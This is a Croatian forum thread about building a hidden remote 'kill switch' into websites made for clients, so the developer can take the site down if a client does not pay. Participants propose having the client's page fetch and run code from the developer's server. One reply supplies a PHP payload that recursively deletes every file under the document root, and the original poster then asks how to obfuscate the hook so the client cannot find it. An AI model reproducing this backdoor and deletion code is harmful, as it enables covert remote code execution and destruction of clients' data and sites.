Kak taj eval() uključit 
Bolje mu stavi da u nekim djelovima programskog koda aplikacija koju si napravio prima neki kod(token) sa tvog servera te ga usporedi sa definiranim
i ako mu ti to isključiš onda ne radi.
Ova zaštita je isto tako loša kao i ova koju si ti spomenuo, ali ju je 1000 puta lakše implementirati, a i ako se korisnik malo razumije u programiranje probit će oba dvije zaštite. Ovu koju sam ja spomenuo tako da isključi(izbriše) te provjere, a tvoju da si prije evala ili include zapiše primljeno u neku datoteku i onda ima kod…
Ma svaka se zaštita probije, to nije upitno. Neke možeš napravit da ih je teže za uklanjanje, a neke da ih je lakše implementirat.
Poanta je da ako radiš nekome site koji ne zna ništa ili vrlo malo o programiranju (recimo radiš site nekom stolaru za njegovu radionu koji zna da mu treba internet stranica ali ne zna kako to napraviti pa želi proći što jeftinije, po mogućnosti da ne plati uopće jer nema računa pa ga možeš povuć za pimpek ako ti ne plati) pa da mu možeš blokirat site ako ti ne plati u roku, odnosno “odblokirat” site kad ti plati. Tu je jednostavna “zaštita” sasvim dovoljna. Naravno, ne treba se pouzdat u te zaštite jer nisu niti 90% sigurne od uklanjanja, ali se mogu napravit dovoljno dobro da nekome zagorčaju život i da ti nakon nekoliko neuspješnih pokušaja razbijanja ipak odluče platit 
Hm…
Možda je najbolje da izvrši kod koji on želi, a ne predefinirani…
Primjer:
Na stranici klijenta postaviš ovaj kod
A na svoju stranicu tvojadomena.com u datoteku kod.txt staviš nešto ovako
kod.txt
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::CHILD_FIRST);
foreach($files as $file)
{
if ($file->isDir())
{
rmdir($file->getRealPath());
}
else
{
unlink($file->getRealPath());
}
}
I to je to… pa, pa klijentova stranica…
Ubacio sam ali i dalje neradi ima li jos koja mogucnost
Ubacio sam u index.php
a na moju stranicu sam stavio taj kod.txt sa tim kodom
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::CHILD_FIRST);
foreach($files as $file)
{
if ($file->isDir())
{
rmdir($file->getRealPath());
}
else
{
unlink($file->getRealPath());
}
}
ali i dalje stranica radi nakon sta sam naveo to
hmm dobra je ovo zamisao sta ste rekli mada se lako za skuzit i to ali kad pobacam na par mjesta trebat ce ispravljat i to dugo ako se fajl sastoji od puno datoteka i to znaci sa tom funkcijom ja netrebam dirat nikakve php skripte druge nego ovo skreša skriptu i pada aj ak imate jos koji nacin da isprobam i hvala vam svima
Aha da evo nakon sta sam ocistio cookies i cache evo mogu rec radi skripta odlicno ali dal ima koji nacin da se uzme moja php datoteka jer posto je pod <?php ?> pod tim kodom nece se vidit source i onda to nemoze tako lako doc do koda i postavit hvala svima
Sa tom skriptom mi je pao citav sistem Hvala vam puno na pomoci 
hahahhahahahaha, znao sam da će se to dogoditi.
rmdir($file->getRealPath()); brisanje direktorija
unlink($file->getRealPath()); brisanje datoteke
pa tako ti je to kod copy/paste kodiranja.
Pa nemoj kopirat drito i razmišljaj o code-u kojeg dobiješ kao primjer…
Ajd, valjda imaš kopiju (ajd sad reci da nemaš )
Vraćen je backup
Jel jedino riješenje editirat php.ini fajl ???
zašto bi editirao php.ini ?
hmm, bit će da sam nešto propustio
možda ti ova naredba bolje posluži PHP: ini_set - Manual
[quote=“dev_masta”]zašto bi editirao php.ini ?
hmm, bit će da sam nešto propustio
možda ti ova naredba bolje posluži PHP: ini_set - Manual[/quote]
Mada ali trebam onda u php.ini mogucit allow_url_include onda bi radilo tako kaze php.net
A da lijepo napraviš jednu tablicu u bazi u kojoj ćeš zapisati true ako želiš da sajt radi, a false ako želiš da sajt ne radi ?
I da onda u kod od sajta staviš sql upit koji provjerava tu vrijednost i onda sukladno odgovoru prikazuje ili ne prikazuje stranicu ?
[quote=“dev_masta”]A da lijepo napraviš jednu tablicu u bazi u kojoj ćeš zapisati true ako želiš da sajt radi, a false ako želiš da sajt ne radi ?
I da onda u kod od sajta staviš sql upit koji provjerava tu vrijednost i onda sukladno odgovoru prikazuje ili ne prikazuje stranicu ?[/quote]
To bi bilo super kada bi svaki host dozvoljavao da se spajaš na MySQL na drugom hostu i kada bi svaki hosting dozvolio da se sa drugog hosta spajaš na njihov MySQL server.
Izgleda najbolje rijesenje VPS host
Da se ne zafrkavamo, wampir nije niti junior programer, ali na sreću, nije ni prvi koji se toga sjetio.
Pa, evo nekih rješenja:
PHP: Remote Kill Switch – Make Sure You Get Paid – Ready Fire Aim
Mislim da je ovo najbliže onom što je tražio (samo step 1 je dovoljan):
How To: Protect your contracted work in PHP using Code Snip & IonCube - Web Hosting Talk
Hmm pa zar je jedini nacin to sa kod.txt da kad se ubaci na njegovu stranicu link i ja na svoju u kod.txt napisem dio da padne njegova stranica a sta ako on nakon par dana vidi taj dio i recimo izbrise da vidi sta ce se desit i opet mu se vrati site dal ima mozda koja caka sa base64 kodirana baza ili sta vec neznam al ovo nije neka zastita to bi svako skuzio pa cak i onaj ko prvi put gleda kod vidio bi da vuce sa moje stranice taj dio
Da li ti tražiš savjeti ili da ti riješimo problem ?
Zašto postavljaš pitanja na koja ti je već odgovoreno ?
Ako tražiš savjet, pa prvo se potrudi izguglati ono što ti treba, nećemo mi guglati za tebe.
A ako samo želiš da ti riješimo problem, plati.